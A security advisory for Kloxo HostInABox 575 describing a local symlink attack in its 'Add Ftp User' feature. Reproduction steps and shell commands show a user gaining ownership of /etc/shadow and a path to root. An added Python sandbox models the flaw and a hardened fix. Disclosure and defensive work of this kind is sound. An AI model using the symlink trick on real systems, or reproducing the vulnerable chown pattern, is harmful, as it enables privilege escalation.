Kloxo HostInABox 575 - local users can take control of any file or directory



DESCRIPTION


Local users can take ownership of any file via a symlink attack when adding FTP users: the ownership change Kloxo applies to the new virtual directory follows symlinks, so a symlink planted at the virtual directory path hands the link target to the user.



IMPACT


Local users could obtain root privileges. Once a user owns /etc/shadow (as shown below), they can make it writable and replace the root password hash.


STEPS TO REPRODUCE


1. Log into Kloxo
2. Click "Ftp Users"
3. Click "Add Ftp User"
4. In the "Ftp User Name" box, type: example
5. In the "Password" and "Confirm Password" boxes, type whatever you'd like
6. In the "Virtual Directory" box, type: example
7. Before clicking "Add", from a shell on the server, create a symlink at the virtual directory path (/home/username/example, here /home/user1/example) pointing to /etc/shadow:


[user1@testing574 user1]$ ln -s /etc/shadow example


8. Click "Add"

Observe that user1 now owns /etc/shadow (the ownership change was applied to the symlink target, not to the link):

[user1@testing574 user1]$ ls -l /etc/shadow
-r-------- 1 user1 root 1415 May 19 17:05 /etc/shadow
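The following is an added example, not Kloxo code. It models the flaw in the steps above with two hypothetical provisioning functions: a vulnerable one whose existence check and chown both follow symlinks, and a hardened one that refuses anything but a plain directory and changes ownership through an open descriptor so no path is re-resolved between check and use. The sandbox (a stand-in file for /etc/shadow, a home directory, the attacker's symlink) is constructed in a temporary directory and runs as the current user; since the chown is then a no-op on ownership, each function returns the inode it actually operated on, which is what shows where the chown landed.

```python
"""Model of the Kloxo "Add Ftp User" symlink bug: a chown on a user-controlled
path follows symlinks, so ~/example -> /etc/shadow hands the real file to the
user.  Added example, not Kloxo code; both provisioning functions are
hypothetical reconstructions."""
import errno
import os
import stat
import tempfile


def provision_vulnerable(home, name, uid, gid):
    """Hypothetical vulnerable step: the existence check and chown follow symlinks."""
    path = os.path.join(home, name)
    if not os.path.exists(path):      # exists() follows the link, so the target "exists"
        os.mkdir(path)
    os.chown(path, uid, gid)          # chown(2) follows the link: the target is chowned
    st = os.stat(path)                # identity of what actually received the chown
    return (st.st_dev, st.st_ino)


def provision_hardened(home, name, uid, gid):
    """Hardened step: single path component, never follow symlinks, chown by descriptor."""
    if not name or name in (".", "..") or "/" in name or "\0" in name:
        raise ValueError("virtual directory must be a single path component")
    home_fd = os.open(home, os.O_RDONLY | os.O_DIRECTORY)
    try:
        try:
            os.mkdir(name, 0o755, dir_fd=home_fd)   # EEXIST if anything, symlink included, is there
        except FileExistsError:
            pass
        # O_NOFOLLOW | O_DIRECTORY: a symlink fails with ELOOP, a regular file with ENOTDIR
        fd = os.open(name, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=home_fd)
        try:
            os.fchown(fd, uid, gid)   # acts on the opened inode; no path is re-resolved
            st = os.fstat(fd)
            return (st.st_dev, st.st_ino)
        finally:
            os.close(fd)
    finally:
        os.close(home_fd)


def demo():
    """Constructed sandbox: a stand-in for /etc/shadow plus a user home holding
    the attacker's symlink (step 7 of the advisory).  Returns which file each
    variant touched and whether the hardened variant refused the symlink."""
    uid, gid = os.getuid(), os.getgid()
    with tempfile.TemporaryDirectory() as root:
        shadow = os.path.join(root, "shadow")       # stand-in for /etc/shadow
        with open(shadow, "w") as f:
            f.write("root:$6$constructed:0:0:99999:7:::\n")
        home = os.path.join(root, "home", "user1")
        os.makedirs(home)
        os.symlink(shadow, os.path.join(home, "example"))   # ln -s /etc/shadow example

        st = os.stat(shadow)
        shadow_id = (st.st_dev, st.st_ino)

        vuln_target = provision_vulnerable(home, "example", uid, gid)

        hardened_err = None
        try:
            provision_hardened(home, "example", uid, gid)
        except OSError as e:
            hardened_err = e.errno

        # A clean name must still provision normally under the hardened version
        clean_id = provision_hardened(home, "clean", uid, gid)
        clean_is_dir = stat.S_ISDIR(os.lstat(os.path.join(home, "clean")).st_mode)

        return {
            "vulnerable_chowned_shadow": vuln_target == shadow_id,
            "hardened_refused_symlink": hardened_err in (errno.ELOOP, errno.ENOTDIR),
            "hardened_clean_dir_ok": clean_is_dir and clean_id != shadow_id,
        }


if __name__ == "__main__":
    print(demo())
```

The mkdir-then-open-with-O_NOFOLLOW sequence matters more than any lstat check: an lstat followed by a path-based chown leaves a window in which the user can swap the directory for a symlink, whereas fchown on a descriptor opened with O_NOFOLLOW cannot be redirected after the fact.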